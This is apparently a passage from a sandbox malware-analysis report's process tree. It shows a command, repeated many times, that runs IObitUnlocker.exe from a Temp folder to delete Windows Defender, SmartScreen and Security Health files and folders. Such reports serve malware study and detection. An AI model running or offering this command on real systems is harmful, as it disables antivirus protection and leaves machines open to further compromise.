Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10468
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:10608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10856
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10472
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10824
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 